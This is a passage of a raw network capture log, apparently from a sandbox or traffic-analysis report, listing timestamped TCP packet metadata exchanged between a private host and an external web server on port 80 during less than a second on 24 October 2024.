Oct 24, 2024 13:02:14.185441017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.185467005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.185487986 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.185503960 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.186028957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.186053991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.186072111 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.186089039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.186753035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.186777115 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.186800957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.186810970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.186821938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.186846018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.187480927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.187505007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.187524080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.187537909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.188218117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.188241005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.188260078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.188275099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.188951015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.188978910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.188992023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.189013958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.189021111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.189059019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.189655066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.189675093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.189697027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.189704895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.189723015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.189743996 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.190431118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.190448046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.190471888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.190498114 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.191025972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191045046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191065073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.191075087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191087961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.191107988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191118956 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.191148043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.191910028 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191930056 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191948891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.191962957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.192020893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.192020893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.192831993 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.192851067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.192867994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.192883015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.192893982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.192915916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.192924976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.192958117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.193664074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.193685055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.193702936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.193708897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.193721056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.193734884 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.194569111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.194587946 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.194610119 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.194622993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.194631100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.194665909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.195430040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.195451975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.195465088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.195476055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.195486069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.195502043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.195508957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.195543051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.302777052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.302840948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.302977085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.303077936 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342052937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342114925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342200994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342220068 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342242002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342257023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342542887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342565060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342585087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342596054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342607021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342628002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.342634916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.342665911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.343461990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.343482971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.343507051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.343518019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.343540907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.344383955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.344413996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.344434977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.344444990 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.344468117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.344477892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.344486952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.344521999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.345325947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.345350027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.345372915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.345380068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.345391989 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.345408916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.346266985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.346288919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.346311092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.346321106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.346332073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.346349001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.346355915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.346385002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.347199917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.347213984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.347232103 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.347242117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.347249031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.347279072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.348103046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.348117113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.348135948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.348148108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.348157883 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.348228931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.349042892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349056959 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349077940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349098921 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.349132061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.349813938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349828005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349853992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349867105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.349874973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.349966049 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.350539923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.350554943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.350570917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.350581884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.350600958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.350625038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.351284027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.351304054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.351327896 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.351341963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.351351023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.351362944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.351381063 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.351398945 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.352010965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352024078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352040052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352055073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352067947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.352076054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.352114916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.352916002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352929115 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352947950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.352977991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.352999926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.353550911 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.353565931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.353584051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.353627920 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.353634119 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.421696901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.421740055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.421761036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.421782970 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.461232901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.461291075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.461301088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.461323977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.461329937 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.461380959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.461927891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.461961985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.461988926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.462012053 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.462205887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.462228060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.462250948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.462265968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.462646008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.462666988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.462692976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.462702990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.462713003 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.462814093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.463485956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.463506937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.463532925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.463540077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.463548899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.463568926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.463579893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.463629961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.464216948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.464236975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.464258909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.464270115 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.464282036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.464298010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.464304924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.464345932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465058088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465082884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465101957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465114117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465123892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465141058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465852976 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465877056 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465892076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465898991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465909958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465929985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465938091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465959072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.465969086 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.465998888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.466645002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.466664076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.466687918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.466696024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.466712952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.466726065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.467427969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.467447996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.467469931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.467480898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.467489958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.467648029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468306065 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468327045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468353033 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468362093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468374968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468385935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468396902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468426943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468875885 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468894958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468916893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468928099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468945026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468954086 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468971968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.468983889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.468996048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.469026089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.469691038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.469712973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.469724894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.469738007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.469762087 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.469773054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.501034975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501058102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501087904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501096964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.501125097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501142979 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501168013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501183033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.501183033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.501200914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.501211882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.501233101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.501396894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.502043962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.502064943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.502094030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.502103090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.502111912 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.502131939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.502166033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.502187014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.502562046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.502574921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.502634048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.502634048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.510701895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.510792971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.510934114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.510972023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.580416918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580451965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580476046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580502987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.580538034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.580642939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580665112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580689907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580710888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.580720901 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.580740929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.580765009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.581407070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.581427097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.581451893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.581464052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.581475019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.581491947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.581501961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.581525087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.581535101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.581568003 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.582365990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.582397938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.582406998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.582427025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.582436085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.582453966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.582463026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.582479954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.582498074 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.582515001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.583353043 CEST	80	49711	185.215.113.37	192.168.2.6
